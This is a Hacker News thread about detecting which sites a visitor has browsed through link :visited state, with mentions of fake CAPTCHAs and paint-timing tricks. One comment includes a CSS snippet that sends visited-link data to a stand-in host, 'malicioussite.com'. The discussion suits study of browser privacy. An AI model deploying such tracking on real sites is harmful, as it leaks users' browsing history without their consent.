[excitom]

This reminds me of my favorite hackathon project. The idea was to guess which college/university a person attended when they visited our website. I put a list of links to college bookstores in a hidden iframe. Then I had javascript that scanned the list to see which links were showing the "visited" color.

Browser people quickly realized the intrusive potential of this "feature" and disabled getting the visited status of a link.

[NackerHughes]

You can still do this today via CSS. Simply add an ::after pseudo-element to the :visited link with a URL that you control, e.g.: (semi-pseudocode example):

    a[href="https://foouniversity.edu/bookstore/"]:visited::after {
        content: url(https://malicioussite.com/fingerprintme.png?wentto=foouniversity);
    }

The user's browser will handily automatically send a request to the site, logging their visit on your end.

Not 100% sure if browsers block this (they probably can, or otherwise definitely should!) via cross-origin policies or whatever, but if you control the site that the links are on then you can set the cross-origin policy yourself, without any need of a hidden iframe or similar things that are 'obviously scary' to safety-conscious Chromium browsers.

This isn't just something I made up either:

https://csstracking.dev/

https://css-tricks.com/css-based-fingerprinting/

https://github.com/OliverBrotchie/CSS-Fingerprint

[varun_ch]

I actually posted a demo of a modern spin on this here recently: https://news.ycombinator.com/item?id=30569396 :)

Since browsers don't allow websites to detect the link colour, we can just trick the user into telling it for us.

https://varun.ch/history

After posting that, I got some emails from others, and someone shared a cool technique involving detecting how long it takes to paint the link to the screen. https://ndev.tk/visted/

[colejohnson66]

This black square demo didn’t work on my iPhone (iOS 16.1). I obviously have HN in the tab’s history, but it didn’t detect it.

[watermelon0]

Works for me on 16.1.1 with both Safari and Chrome (not that there are that many differences anyways.)

It detected HN and other sites.

[Am4TIfIsER0ppos]

> invisible captcha

Disabling javascript saves the day again?

[varun_ch]

It should also be possible to make a fake CAPTCHA without JavaScript - just a little more clunky: https://news.ycombinator.com/item?id=30576517

[runlevel1]

Was this pre ~2011? I thought all the major browser vendors stopped returning :visited style information back then.

EDIT: https://developer.mozilla.org/en-US/docs/Web/CSS/Privacy_and...

[excitom]

Yes, it was 2010.

[wslh]

How do you inspect an iframe from a third party? Since the iframe can't be read by a script from your site. Is there something missing in the explanation?

[Domenic_S]

I assume he owned the iframe that contained the links, and passed back the visited/not visited status with postmessage

[Arrath]

Clever!